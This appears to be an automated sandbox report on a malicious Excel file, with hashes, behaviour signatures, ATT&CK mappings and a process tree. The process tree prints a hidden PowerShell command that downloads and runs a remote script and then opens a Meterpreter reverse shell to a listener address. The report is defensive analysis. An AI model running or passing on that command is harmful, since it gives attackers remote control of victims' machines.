Analysis

  • max time kernel
    44s
  • max time network
    17s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    04-07-2024 21:59

General

  • Target

    b7151cb567790466a363e545251589008459b00c6a8a30dacad540aac09ce922.xls

  • Size

    34KB

  • MD5

    2c8e68bed900a04069794647be857367

  • SHA1

    b6fb06f193140dc93b8e2b2fc176ec2a7507ec71

  • SHA256

    b7151cb567790466a363e545251589008459b00c6a8a30dacad540aac09ce922

  • SHA512

    c62deaf9283c428a710ec5afa57f0d1730eb69f0ec3f8257fe14a3107f42876e2ff2800520e1f99fc3bdf9155af38cdb278d318df64feb21dc0c1e02c22d2297

  • SSDEEP

    768:ZveWFwP+SKabAk0BuqCXlg+/fs5cClfZw2gmVXqA4LQYgO1mQQpSFeVAmcil:5SP+SKabAk0BuqCXlg+/fs5cClfZw2gQ

Score
10/10

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 4 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell and hide display window.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Drops file in System32 directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\b7151cb567790466a363e545251589008459b00c6a8a30dacad540aac09ce922.xls
    1⤵
    • Enumerates system info in registry
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2056
    • C:\Windows\SysWOW64\wscript.exe
      wscript C:\Users\Public\config.vbs
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2596
      • C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -nop -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1300
  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell.exe -WindowStyle Hidden -noprofile -noexit -c IEX ((New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/enigma0x3/Generate-Macro/master/Generate-Macro.ps1')); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 172.19.240.124 -Lport 1234 -Force
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Command and Scripting Interpreter: PowerShell
    • Drops file in System32 directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    PID:552

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

1
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\K6YCJ4Y3IIVIGZQCSY00.temp
    Filesize

    7KB

    MD5

    1253db1c10cad5aa2a8c203b1353e1be

    SHA1

    8ed5f17510676f85d895ef4ff118d7df3a9a1d2c

    SHA256

    8707e8a0e02552c67bebf8b60b8b26c6bbdc485a79b3fe4950b9c04e8e6dcaaf

    SHA512

    59360fd3733c05d88063d78ccdab7f2b489fd7ebfa5613eb6cb70b06739a6f1d1bc5332d30db209661334e7a69f5cbd7cdb1edceba438d033dde91e3d3281af4

  • C:\Users\Public\config.vbs
    Filesize

    461B

    MD5

    ce52ab154163c511f0efa6a61e22ab64

    SHA1

    9f12cc215e15802eddcb02cb5370ef16b21fa3a6

    SHA256

    df342167afd4f1758c02b8793b27a2f9e35f074ea20aa1aa75c69d48d88fcd17

    SHA512

    cf50d9b51fcb4f3150aeca158a7a2249b1f5806d0e9ffc2b479ef936a7d85fdaaf302ce5cb3263e03b3c7805d38ca734f167ff757e6b6cdf89343f13a2bf0f78

  • memory/552-45-0x000000001B740000-0x000000001BA22000-memory.dmp
    Filesize

    2.9MB

  • memory/552-46-0x0000000001DB0000-0x0000000001DB8000-memory.dmp
    Filesize

    32KB

  • memory/2056-18-0x00000000061D0000-0x00000000062D0000-memory.dmp
    Filesize

    1024KB

  • memory/2056-38-0x00000000061D0000-0x00000000062D0000-memory.dmp
    Filesize

    1024KB

  • memory/2056-37-0x00000000061D0000-0x00000000062D0000-memory.dmp
    Filesize

    1024KB

  • memory/2056-39-0x00000000061D0000-0x00000000062D0000-memory.dmp
    Filesize

    1024KB

  • memory/2056-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
    Filesize

    64KB

  • memory/2056-17-0x00000000061D0000-0x00000000062D0000-memory.dmp
    Filesize

    1024KB

  • memory/2056-1-0x0000000072A0D000-0x0000000072A18000-memory.dmp
    Filesize

    44KB

  • memory/2056-49-0x0000000072A0D000-0x0000000072A18000-memory.dmp
    Filesize

    44KB

  • memory/2056-50-0x00000000061D0000-0x00000000062D0000-memory.dmp
    Filesize

    1024KB

  • memory/2056-51-0x00000000061D0000-0x00000000062D0000-memory.dmp
    Filesize

    1024KB

  • memory/2056-52-0x00000000061D0000-0x00000000062D0000-memory.dmp
    Filesize

    1024KB